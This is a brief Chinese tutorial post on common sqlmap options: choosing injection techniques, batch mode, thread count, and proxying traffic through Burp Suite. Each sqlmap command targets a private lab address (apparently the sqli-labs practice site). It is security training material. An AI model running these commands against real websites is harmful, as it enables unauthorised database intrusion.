Sqlmap中代理及其他常用参数
  TEZNKK3IfmPf 2023年11月13日 22 0
sql

一、不指定注入类型,会自动进行多种注入测试

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"

Sqlmap中代理及其他常用参数

二、指定注入

1、指定联合注入

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique U

Sqlmap中代理及其他常用参数

2、指定联合加布尔注入

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique UB

Sqlmap中代理及其他常用参数

三、指定其他注入

1、B:布尔注入

2、E:报错注入

3、U:联合注入

4、S:语句查询注入

5、T:延时注入

四、自动选择默认提示,不会弹出提示框让我们选择yes或no

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --batch

Sqlmap中代理及其他常用参数

五、指定线程数,最大线程数是10

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --thread 5 --batch

Sqlmap中代理及其他常用参数

六、设置代理

1、先设置好代理

Sqlmap中代理及其他常用参数

2、sqlmap指定代理服务器

sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --proxy="http://127.0.0.1:8080"

Sqlmap中代理及其他常用参数

3、发送的所有payload,我们在BurpSuite中都可以看到

Sqlmap中代理及其他常用参数

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月13日 0

暂无评论

推荐阅读
  TEZNKK3IfmPf   2024年05月17日   48   0   0 dremiosqltable
  TEZNKK3IfmPf   2024年04月26日   56   0   0 java数据库sql
  TEZNKK3IfmPf   2024年05月17日   52   0   0 sqlmysql
  TEZNKK3IfmPf   2024年05月17日   38   0   0 sqlcube
  TEZNKK3IfmPf   2024年04月26日   29   0   0 javasql
  TEZNKK3IfmPf   2024年04月19日   52   0   0 sqlUser
TEZNKK3IfmPf